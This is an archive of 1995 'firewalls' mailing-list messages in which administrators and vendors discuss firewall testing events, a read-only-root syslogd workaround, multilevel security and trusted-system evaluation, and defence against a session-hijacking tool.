(localhost.ipsilon.com [127.0.0.1]) by servo.ipsilon.com (8.6.11/8.6.10) with SMTP id SAA21162; Tue, 1 Aug 1995 18:01:38 -0700 Message-Id: <199508020101.SAA21162@servo.ipsilon.com> X-Authentication-Warning: servo.ipsilon.com: Host localhost.ipsilon.com didn't use HELO protocol X-Mailer: exmh version 1.6beta 3/23/95 To: kaplan@bpa.arizona.edu (Ray Kaplan) cc: firewalls@greatcircle.com Subject: Re: sidewinder challenge Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 01 Aug 1995 18:01:36 -0700 From: Craig Anderson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Craig Anderson writes: > > >So how about doing the Firewall industry equivalent of the NFS industries > >week-long Inter-Op conference. No marketing weenies allowed, just technical > >people from each participating vendor attacking each others machines to > >help improve the industry. No technical results will be published. > >If some vendor just wants free development help, don't help. Just > >point out to each other the weaknesses found. > > Great idea - how do we do it. Great possibilities here, too. Consider > > RayK 8) - Better Living Through Authentication - I usually only speak for myself Start by piggy-backing on the NFS Connectathon (if Sun is interested; I can ask the right people if need be, unless they're listening already). The Rules of Engagement (proposed) Have each vendor distribute their configuration to all registered participants at least 2 weeks beforehand. The published configuration should be the configuration the vendor intends to field, to speed up the hack-cycle (we only have a week). The configuration should not change but it does not have to be all that detailed. A block diagram of what networks are connected to which firewall, the exact version and product name being fielded, etc. The Published configuration must include the location of a file that must be retrieved from the firewall and another file that must be retrieved from a host behind the firewall. The files should be plain-text. Getting either file constitues a win. Wins should not be published! Period. Not even a count of wins. Security Contractors can participate by registering as combatants and try to break into vendor machines. If someone gets a win they MUST describe (in detail!) how they did it to the losing vendor. All participants must register with their REAL NAME and show ID to prove it. And somebody please invite the military/NSA/defense-contractors/etc. Marketing weenies will be stopped at the door; this is for techies only. Denial of Service attacks are confined to one specific day of the Firewall Connectathon and do not constitue a win. They are only embarasing to the vendor, if say, the firewall crashes because of the attack. Maybe we can all learn how to diagnose and treat Denail of Service attacks better. Given that this is just about firewalls and not the entire spectrum of security policy, physical security of the firewall is not at issue and should not be attempted. Though it can definitly be discussed and evaluated. The point of this is to grow and mature the industry, not to gain adversarial advantage over your competitors. Professionalism is important. Violators will not be invited back next year. If it gets big and successful, maybe we should change the name to "the Hack-Fest" or something. Craig Anderson From firewalls-owner Tue Aug 1 19:07:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA05067 for firewalls-outgoing; Tue, 1 Aug 1995 18:51:40 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA05042 for ; Tue, 1 Aug 1995 18:51:36 -0700 Received: from mailhub.nol.com.sg(202.42.165.2) by miles via smap (V1.3) id sma005036; Tue Aug 1 18:51:10 1995 X400-Received: by /c=sg/admd=tas/prmd=nol/; Relayed; 02 Aug 1995 09:47:40 +0800 X400-Received: by mta nolmta in /c=sg/admd=tas/prmd=nol/; Relayed; 02 Aug 1995 09:47:40 +0800 X400-MTS-Identifier: [/c=sg/admd=tas/prmd=nol/; 066BE301ED93C001-nolmta] Content-Identifier: 066BE301ED93C001 Content-Return: Allowed X400-Content-Type: P2-1988 ( 22 ) Conversion: Allowed Original-Encoded-Information-Types: ( IA5-Text); Priority: normal Disclose-Recipients: Prohibited Alternate-Recipient: Allowed X400-Originator: tists9@mailhub.nol.com.sg X400-Recipients: non-disclosure; Message-Id: <066BE301ED93C001*/c=sg/admd=tas/prmd=nol/o=nol/ou=nolsgp/s=tists9/@MHS> Date: 02 Aug 1995 09:47:40 +0800 From: TISTS9 To: "Aramanuj%ens.com" (Return requested) cc: "firewalls%greatcircle.com" (Return requested) Subject: Firewall setup using SUN Netra i MIME-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Since you are on novell netware, why don't you try Nov*ix from Firefox. It can save you a lot of IP addresses as well as ack as a firewall between your Netware network and your (in)secure world! Thanks Calvin Yap Send To : firewalls%greatcircle.com @ internet cc : >From : Aramanuj%ens.com @ internet Date : 02/08/95 09:42:00 AM Subject : Firewall setup using SUN Netra i ____________________________ Start of Memo _____________________________ Hi folks, Has anyone set up a SUN Netra i as an internet server on a single port ethernet router (ex:CISCO 2501). What are the implications if we use packet filtering at the router level as well as netra internal security. Will this setup still be considered as a "single-point-of-comprimise/failure" ? ps we are on a novell netware 3.12 and due to get in to the (IN)secure world of INTERNET!! thanks in advance arathy ram ____________________________ End of Memo _____________________________ From firewalls-owner Tue Aug 1 20:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09525 for firewalls-outgoing; Tue, 1 Aug 1995 20:13:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09499 for ; Tue, 1 Aug 1995 20:13:24 -0700 Received: from myall.awadi.com.au(150.207.2.65) by miles via smap (V1.3) id sma009487; Tue Aug 1 20:13:03 1995 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA11095; Wed, 2 Aug 95 12:41:07 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA16268; Wed, 2 Aug 1995 12:39:34 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9508020309.AA16268@bunya.awadi> Subject: Problems with making / read-only To: firewalls@greatcircle.com Date: Wed, 2 Aug 1995 12:39:35 +0930 (CST) X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks, We are trying to build a new firewall and on of the things I wanted to do was make / and /user read only by diddling the SCSI Disk links. For the moment we are just mounting the disk ro to see what falls over. Most of the problems have been worked around in one way or another but we are having a major problem with syslogd - it insists on recreating /dev/log. Have people solved this problem before? If so, how? If it helps, we are running SunOS 4.1.3_U1 on the box -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". From firewalls-owner Tue Aug 1 21:01:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA10477 for firewalls-outgoing; Tue, 1 Aug 1995 20:37:19 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA10042 for ; Tue, 1 Aug 1995 20:36:25 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smaa10030; Tue Aug 1 20:35:37 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id TAA11195; Tue, 1 Aug 1995 19:52:34 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by mycroft via smap (V1.3mjr) id sma011169; Tue Aug 1 19:52:11 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA15305; Tue, 1 Aug 95 22:49:53 -0400 Date: Tue, 1 Aug 95 22:49:53 -0400 Message-Id: <9508020249.AA15305@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Firewalls Testing Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>The European ITSEC seesm to be taking a much more corporate-friendly >>approach to evaluations: companies hire organizations (CLEFs) that do the >>evaluation, rather than relying on a (free but overworked - and therefore >>slow) NCSC. Ah yess, socialized medicine vs "free market". But arn't the places switched ? Ray rote: > The labs that I see my clients >using to test their client / server stuff before they deploy then start in >the neighborhood of $1megabuck and have a staff of 10 wizards from various >disiplines, plus a giazillion consultants available for piece work. Anyone >got about $10mil loose that they can seed this with? ;) Gee prices have gone up since I mentioned it a year ago (and five years ago for anti-virus product testing). And the Firewalls-Standards group seems to have died out. Suspect $5mil to start & $2mil a year plus some effective begging from Sun, HP, IBM, DEC etc. would be un-scared. Why not-for-profit exists. Warmly, Padgett ps waiting for Erin From firewalls-owner Tue Aug 1 21:26:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09624 for firewalls-outgoing; Tue, 1 Aug 1995 20:18:27 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09608 for ; Tue, 1 Aug 1995 20:18:24 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma009603; Tue Aug 1 20:17:25 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA15322; Tue, 1 Aug 95 22:59:07 -0400 Date: Tue, 1 Aug 95 22:59:06 -0400 Message-Id: <9508020259.AA15322@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "njb@csehost.knoware.nl"@UVS1.dnet.mmc.com Cc: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Re: Multilevel systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Nils rites: >Please explain these seemingly contradictory statements. What is the >difference between THE firewall and A firewall? I find it difficult to see >any great conceptual difference between the protection (firewall) you >install to separate parts of a WAN and the protection (firewall) you install >to separate LANs. Reasonable question. The problem with a multilevel protection at the firewall is that the external gateway is not a good place to try to separate comingled functions e.g. HR and Finance on the same backbone. If instead the separation exists between equally trusted/equally untrusted levels then a binary function works, for multilevel networks the only real answer is encryption. Consider finance. The single point firewall or internal filter does not have to be concerned about anything on the internal (finance) net, nor anything on the outside. Its only concern is things attempting to cross the link. Multilevel on the other hand must consider separation of two elements on the same net and that is *much* more difficult. >Just like anti-virus protection: On most networks the behaviour-blockers >installed on all the PC type workstations constitute an extremely good >perimeter defence; however inside extra-secure subnets you prevent >unauthorised (standard) diskettes from being accessible, thus forcing all >software on diskettes to pass through a virus-scanning gateway (which we >call a "sheep-dip computer") that encrypts track zero on approved diskettes >from the outside, thus authorising them, and decrypts track zero on >diskettes from the inside to be used on outside computers, after having >certified that the informaton transported on the diskette is actually >allowed to be carried out of the organisation. You mean like changing the third byte in the FBR from a 90h to "something else" so that DOS refuses to read it ? Change "BATCOMEXE" to BBBCCCEEE ? Wouldn't know about that 8*). Warmly, Padgett From firewalls-owner Tue Aug 1 22:00:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12923 for firewalls-outgoing; Tue, 1 Aug 1995 21:44:55 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12884 for ; Tue, 1 Aug 1995 21:44:50 -0700 Received: from sunthing.sjsinc.com(140.174.165.1) by miles via smap (V1.3) id sma012873; Tue Aug 1 21:44:39 1995 Received: by sunthing.sjsinc.com Mailer: sendmail (8.6.12/8.6.9) Protocol: Id: VAA14720; Tue, 1 Aug 1995 21:42:57 -0700 Date: Tue, 1 Aug 1995 21:42:57 -0700 From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) Message-Id: <199508020442.VAA14720@sjsinc.com> To: firewalls@greatcircle.com Subject: Re: Huge gapping hole in Win95 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks: Can anybody suggest a software / hardware package that will address the issue of "big foot in mouth disease." I am trying to extract an oversized shoe from my feeding orifice.... Regards, b c++'ing u, %-) sjs ------------------------------------------------------------------------------- Stefan Jon Silverman - President SJS Associates, N.A., Inc. 572 Chestnut Street Distributed Systems Architecture & Implementation San Francisco, Ca. 94133 Phone: 415 989 2741 E-mail: sjs@sjsinc.com Cell: 415 519 3494 ------------------------------------------------------------------------------- Weebles wobble, but they don't fall down!!! ------------------------------------------------------------------------------- From firewalls-owner Tue Aug 1 22:00:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12109 for firewalls-outgoing; Tue, 1 Aug 1995 21:24:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12084; Tue, 1 Aug 1995 21:24:44 -0700 Received: from quadra.greatcircle.com(198.102.244.36) by miles via smap (V1.3) id sma012078; Tue Aug 1 21:24:12 1995 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 1 Aug 1995 21:23:33 -0800 To: blymn@awadi.com.AU (Brett Lymn), firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Problems with making / read-only Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:39 PM 8/2/95, Brett Lymn wrote: >Folks, > We are trying to build a new firewall and on of the things I >wanted to do was make / and /user read only by diddling the SCSI Disk >links. For the moment we are just mounting the disk ro to see what >falls over. Most of the problems have been worked around in one way >or another but we are having a major problem with syslogd - it insists >on recreating /dev/log. Have people solved this problem before? If >so, how? > >If it helps, we are running SunOS 4.1.3_U1 on the box Wouldn't the same trick you use to make logging work within a chroot'ed FTP partition work here? That is, make /dev/log a symlink to something that _is_ on a writable filesystem? -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Tue Aug 1 22:31:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA14158 for firewalls-outgoing; Tue, 1 Aug 1995 22:15:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA14107 for ; Tue, 1 Aug 1995 22:14:58 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma014088; Tue Aug 1 22:14:18 1995 Received: from relay.tis.com by neptune.TIS.COM id aa26872; 2 Aug 95 1:12 EDT Received: from pluto.tis.com(192.94.214.99) by relay.tis.com via smap (g3.0.1) id xma010804; Wed, 2 Aug 95 01:04:51 -0400 Received: by tis.com (4.1/SMI-4.1) id AA03424; Wed, 2 Aug 95 01:10:38 EDT Date: Wed, 2 Aug 95 01:10:38 EDT From: Marcus J Ranum Message-Id: <9508020510.AA03424@tis.com> To: firewalls@greatcircle.com Subject: firewall standards Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A. Padgett Peterson, P.E. Information Security writes: >Gee prices have gone up since I mentioned it a year ago (and five years ago >for anti-virus product testing). And the Firewalls-Standards group seems to >have died out. The firewalls standards group hasn't died out; it's just that the volume of traffic has dropped to near zero. Since most of the discussion centered around whether or not to talk about performance, firewalls-standards quickly achieved a signal-to-noise ratio on a par with firewalls. We're on target for releasing the firewall product summary format in another week or so. I've been folding the substantive contributions from the list into the draft version. For those who haven't been tracking this, check out http://iwi.com in the "publications" page. mjr. From firewalls-owner Tue Aug 1 23:00:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA15426 for firewalls-outgoing; Tue, 1 Aug 1995 22:38:21 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA15397 for ; Tue, 1 Aug 1995 22:38:17 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma015389; Tue Aug 1 22:38:10 1995 Received: from relay.tis.com by neptune.TIS.COM id aa27109; 2 Aug 95 1:36 EDT Received: from pluto.tis.com(192.94.214.99) by relay.tis.com via smap (g3.0.1) id xma010923; Wed, 2 Aug 95 01:28:05 -0400 Received: by tis.com (4.1/SMI-4.1) id AA03541; Wed, 2 Aug 95 01:33:52 EDT Date: Wed, 2 Aug 95 01:33:52 EDT From: Marcus J Ranum Message-Id: <9508020533.AA03541@tis.com> To: firewalls@greatcircle.com Subject: Problems with making / readonly Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Most of the problems have been worked around in one way >or another but we are having a major problem with syslogd - it insists >on recreating /dev/log. Have people solved this problem before? If >so, how? The BSD-based syslogd has a "-p" flag that specifies a different address to use for the UNIX domain socket. You could do something like put it in /tmp. That leaves all the apps that try to open /dev/log; perhaps you can fool them with a symlink. It really should create it in /var/run/log. mjr. From firewalls-owner Wed Aug 2 00:15:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA19175 for firewalls-outgoing; Tue, 1 Aug 1995 23:39:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA19107 for ; Tue, 1 Aug 1995 23:39:37 -0700 From: Cameron_A_P@ceo.sbic.co.za Received: from net4.sbic.co.za(160.117.116.51) by miles via smap (V1.3) id sma018932; Tue Aug 1 23:38:49 1995 Received: from zork.sbic.co.za by net4.sbic.co.za (5.0/SMI-SVR4) id AA04423; Wed, 2 Aug 1995 08:37:22 +0200 Received: by zork.sbic.co.za (1.00/net4) id AA00151; Wed, 2 Aug 95 08:35:03+2 Date: Wed, 2 Aug 95 08:35:03+2 Message-Id: <9508021235.AA00151@zork.sbic.co.za> To: firewalls@Greatcircle.Com Subject: IPWatcher content-length: 474 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Message: I have come accross a package on Internet Called IPWatcher. This package renders Firewalls and Smart Cards Useless in that it allows the person using it to Hijack and take over an established connection. The URL to get more Info on this package is http://nad.infostructure.com/watcher.html My Question and problem is how do you prevent this from happening. Also are there other Hacker tools that can do this. -- Andrew Cameron Cameron_A_P@ceo.sbic.co.za From firewalls-owner Wed Aug 2 01:13:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA21214 for firewalls-outgoing; Wed, 2 Aug 1995 00:07:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA21203 for ; Wed, 2 Aug 1995 00:07:40 -0700 Received: from myall.awadi.com.au(150.207.2.65) by miles via smap (V1.3) id sma021196; Wed Aug 2 00:07:00 1995 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA15001; Wed, 2 Aug 95 16:03:50 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA17580; Wed, 2 Aug 1995 16:01:16 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9508020631.AA17580@bunya.awadi> Subject: Re: Problems with making / readonly To: mjr@iwi.com (Marcus J Ranum) Date: Wed, 2 Aug 1995 16:01:18 +0930 (CST) Cc: firewalls@greatcircle.com In-Reply-To: <9508020533.AA03541@tis.com> from "Marcus J Ranum" at Aug 2, 95 01:33:52 am X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Marcus J Ranum: > >> Most of the problems have been worked around in one way >>or another but we are having a major problem with syslogd - it insists >>on recreating /dev/log. Have people solved this problem before? If >>so, how? > > The BSD-based syslogd has a "-p" flag that specifies a >different address to use for the UNIX domain socket. You could do >something like put it in /tmp. That leaves all the apps that try >to open /dev/log; perhaps you can fool them with a symlink. It >really should create it in /var/run/log. > Yup that worked. The problem we had was that the -p flag is not documented in Sun's syslogd man page even though the daemon supports it. Thanks for the response! -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". From firewalls-owner Wed Aug 2 01:14:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA19090 for firewalls-outgoing; Tue, 1 Aug 1995 23:39:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA01717 for ; Tue, 1 Aug 1995 08:29:19 -0700 Received: from orpheus.amdahl.com(129.212.11.6) by miles via smap (V1.3) id sma001710; Tue Aug 1 08:28:49 1995 Received: from sousa.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0sdJET-0001ykC; Tue, 1 Aug 95 08:27 PDT Received: by sousa.amdahl.com (Smail3.1.28.1 #4) id m0sdJD9-0003oMC; Tue, 1 Aug 95 08:26 PDT Message-Id: From: jgt10@amdahl.com (John G. Thompson) Subject: Re: multilevel security in firewalls To: mjr@iwi.com Date: Tue, 1 Aug 1995 08:26:26 -0700 (PDT) Cc: ray@skypoint.com, firewalls@greatcircle.com In-Reply-To: <9507310152.AA18351@tis.com> from "Marcus J Ranum" at Jul 30, 95 09:52:43 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 10067 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Ray Kaplan writes: > > >I say that labels and mandatory access control have everything to do with > >building a firewall. > > They'd sure help, you bet. But almost nobody will use them. Too true. > The problem I've often seen is that most of the vendors who > are building firewalls on multilevel systems haven't done a very good > job of explaining how they take advantage of the multilevel aspects > of the system to make the firewall secure. The message is: > > "It's on a B1 system! Therefore it's SECURE!" [...] So true. You can make some very convincing arguements for using Multi-level security to make a host alot more secure. I wish I had all the attack plans that were foiled by a firewall built on a B1 OS. [...] > Whenever the firewalls-on-evaluated-systems thread starts > up, lots of folks (most of whom appear, not surprisingly, to be > selling evaluated systems) start to go down this whole rathole > of formal methods and quality assurance and so on. The problem > is that most folks forget that a firewall embodies two COMPLETELY > DIFFERENT protective relationships: > > 1) How the firewall protects itself from attack > 2) How the firewall protects the network(s) behind it from attack YES!!! > You *COULD* make a strong statement about how your firewall > was using its multilevel security capabilities if you were running > a labelled network on one side, and your firewall "A1 router" did > something like stamp a different label on Internet Packets that would > make them be treated differently. Why aren't more people doing > this? Because of compatibility and installed base and support > issues. I've seen grown men start to cry when they even THINK about > running a labelled network... I can't even think about it. It is tough enough getting everyone to setup and run their DNS and email configurations correctly. Multi-level network??? The cost of setting it up, let alone maintaining it, let alone getting management to buy into it is inconceiveable. > > >I cling to a classic author in the distributed system security field - > >Morrie Gasser. His model says that you establish secure channels between > [...] > >So, I propose that anyone who is serious about mapping their infrastrucutre > >across a network (especially a public network like the Internet) needs to > >use multilevel systems - unless they only have one classification of data > >that they don't care about. I've never seen such an organization - anyone > >else? > > This is indeed the classical view of distributed system security: > 1) All data is important to some degree or another > 2) All data should be separated from all other data > to some degree or another > 3) Most organizations don't separate their data at all > Conclusion: therefore they are wrong > Corollary: therefore they should use multilevel systems Conclusion: Most organizations accept the risk of data compromise or destruction as an acceptable cost. A cost that is far below the cost of implementing the 'correct' protections. Or, they have found other solutions that allow them to spread their infrastructure across the internet with an acceptable risk factor. > The problem is that there are 2 other factors that have to go > into the equation: > 1) Everyone wants to run something that is not available > on a multilevel system This is only a problem on facist MLS systems that don't allow user applications. You can have the same problem on non-MLS systems, firewalls or not. > 2) Managing multilevel systems is harder than managing > ordinary systems and most people don't have time > or patience or budget (or all of the above) for > even that Managing an MLS system is harder. It takes more planning and execution work. The actual management can be made no worse if the configuration works right. > Conclusion: multilevel security systems suck It sucks because it wasn't configured to service the needs of the user community. I worked on a B1 OS evaluation and during that time worked with a group in development to put together an internet firewall. We used the B1 OS because it allowed us to protect the OS from ALL outside attacks and still remain relatively user friendly. ALL is a strong statement. I will qualify it only because we couldn't protect againist administrator error or subversion. Early in the design we were looking at compartmentalizing all the various processes from each other (mail, news, users, etc.) and realized that we sould be spending FAR too much time building and maintaining bridges between the processes. We redesigned with the objective of protecting the OS from eveyone and then the corporation from the outside. [...] > Most of the problems with running multilevel systems could be > fixed with better user interfaces on top of the security stuff. Security > need not be onerous; it can be easy if you put some time into your user > interface. Unfortunately, by the time they have slogged through the > swamp of orange book, most vendors are ready to throw in the towel > and making it actually *good* is not an issue. It just meets the spec. Even with good interfaces there is still the user community to contend with. Unless the benifits of the can be concretely explained it will be an uphill battle to get acceptance and compliance. Most vendors I know of throw in the towel because they realize that by the time the product is evaluted, it is obsolete. It may sell to the government, but then the cost of maintaining the product for the required number of years may quickly eat up an potential profits from the sales to the government. Profits from sales to commercial markets are even more questionable. Commercial sites are more interested in the DIRECT cost benifits from the evaluated OS. Unless marketing has do a supreme job of reseach, it hasn't a clue how to sell the MLS features. Thus, commercial profits are low, if any. With low profits, there is no incentive to add features for commercial evironments that can be out and out security liabilities in the government evironment, thus a catch-22 to spending the time make the product 'good'. > "Meeting the spec" is the real reason multilevel systems won't > take off. It's too late. Too late for the environments that MLS systems would be used in (the rainbow series can't cope with networks. If you think the TNI does, go read it.) and too late when the product is finished with evaluation. Of the two evaluated products I've worked on, both were one or two release behind the current release when the formal evaluation ink dried. Both would have gone into immediate RAMP to get to the current release and both would have skipped one or more commercial releases between RAMP releases. One product never went into RAMP, although the paper work could have been done in a few weeks to do it, because of business decsions to end the product. > Systems that are now widely deployed don't > have any multilevel capability. Hell, most of the computers in the > world have no notion of "user" or "login" or "file permissions." > Upgrading an installed base that size is not an option, and for > networking, multilevel networks require a lot of upgrading to put > into place. I think you are overstating the case. It may be there are more DOS or Apple Macs out there that haven't a clue, but you must also consider that all those users of those machines are also very likely to have an account on a unix, vm, mvs or other system that does have the concept. You are correct that integrating those 'D' systems into more secure systems is a daunting task. [...] > > In my view, the > >biggest problems that have prevented this from becoming common place have > >to do with my experience that: > > > >1) Most organizations would not know a data classification scheme if it bit > [...] > >2) Most organizations are more interested in simply "getting that > >connectivity going" than they are in doing > [...] > > There's a simpler answer and it may be so simple you just > happened to overlook it: for 99% of the things that people want to > do, multilevel secure systems are the last thing on earth they'd > want to do it ON! For the simple reason that they don't see how doing it there would help them instead of severely hindering them. > Most organizations indeed wouldn't know a data classification > scheme if one fell from the sky covered with diamonds. I take both of you to task on this one. Most organizations DO know a data classification system, it is so simple that they overlook its existance. It looks like this: Press Release, Company Confidential, Employee Confidential, Company Proprietary, Company Trade Secret, etc. > And indeed most > of them are trying to just connect the heck out of everything. The > reason is because they are trying to get real work done, and right > or wrong they are using the platforms and methods that work best for > them. Yup. Security comes in 3rd or 4th after function, performance, and other 'more important' issues. > Whenever I run into a horrendous security nightmare it's > because it was easier to keep doing things the way that has always > worked before than to rethink things and do them in a way that might > make more sense and maybe would be more secure. > > That's a *PEOPLE* problem, not a software or hardware > problem. Throwing multilevel security in isn't going to help that > one bit. It's just a tool. Amen! It is a people EDUCATION problem. Until the people involved understand the risks, real or imagined, to the current process and the bottom line monetary cost and benifit NOTHING is going to happen. Even when they do understand, a decsion may be made to do the 'wrong' thing. JGT -- John G. Thompson jgt10@amdahl.com 1-408-992-2088 Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470 [The opinions expressed are MINE. They do not necessarily reflect the policies, procedures, press releases or opionions of the Amdahl Corporation.] From firewalls-owner Wed Aug 2 01:27:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA19235 for firewalls-outgoing; Tue, 1 Aug 1995 23:41:33 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09816 for ; Tue, 1 Aug 1995 20:28:24 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma009810; Tue Aug 1 20:27:57 1995 Received: from relay.tis.com by neptune.TIS.COM id aa25962; 1 Aug 95 23:25 EDT Received: from pluto.tis.com(192.94.214.99) by relay.tis.com via smap (g3.0.1) id xma010259; Tue, 1 Aug 95 23:17:36 -0400 Received: by tis.com (4.1/SMI-4.1) id AA02983; Tue, 1 Aug 95 23:23:22 EDT Date: Tue, 1 Aug 95 23:23:22 EDT From: Marcus J Ranum Message-Id: <9508020323.AA02983@tis.com> To: firewalls@greatcircle.com Subject: the ongoing debate.. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [Some definitions for the unwary: Evaluated system: one that has been tested (evaluated) by the NCSC (NSA) at a specific level of security. it appears on the EPL (evaluated products list). System under evaluation: one that is not yet on the EPL. Note that it may never get evaluated or complete evaluation. Orange Book: the TCSEC (trusted computing security evaluation criteria) sets out a number of features that are checked in evaluation. Systems are evaluated at different digraphs such as the ones you've seen here: D = no security (e.g., windows, etc) C2 = basic features (e.g., UNIX, VMS) B = more complicated features including labelling A = *simpler* with often fewer features but with associated formal design, etc Trusted systems: systems designed with an eye towards the TCSEC Assurance: the property of knowing that what you *think* is, actually *is*, applied to computer security. CMW: compartmented mode workstation. A B1 system with some B2 features. Includes labelling but not covert channel analysis or some of the really wizzo stuff. ] Ray Kaplan writes: >> The rigor of trusted system design is a market disaster and will >>never succeed. When you talk to the trust engineers it's like talking to >>a fredian psychologist. The logic isn't entirely circular, but if you've >>bought into it, then it's inescapable. > >No argument there. However, I confess to confusion that is beyond this. >The more security work I do, the less some of it makes sense. On one hand, >there are people trying to solve hard problems. Many are mired in >organizational politics, have no resources, and can't seem to even deal >with the need for a security policy that is actually implemented and >enforced. On the the other hand, the problems that they confront can't be >solved with the simple technology that they are using. In the face of >this, I've tried to balance the confusion that I feel by seeking out >reasonable answers. They are definitely hard problems. It's one thing to have a system that's full of holes; it's another to have a system that's full of holes and which is used for electronic commerce. It's even another thing still to have a system that's full of holes and which is used for launching H-bombs. On my machine here (switchblade.iwi.com) I'm not running any security and it's *GREAT*! I'm not even behind a firewall! I refuse to firewall off my own home. :) *BUT* my business papers and processing are all done on a different machine and the only thing you can steal from my server here is a bunch of source code I've mostly posted to the 'net years ago. I believe that is the *TYPICAL* Internet connection and I believe this is a perfectly good approach. It doesn't scale real well, though. Now, if I were going to make my machine here be a server for electronic funds transfer, you *betcha* I would not be running X on it! And I'd probably strip it down to a state of near uselessness in order to secure it. If my machine were the launch console for H-bombs I'd strip it to a point of beyond uselessness, to secure it! :) 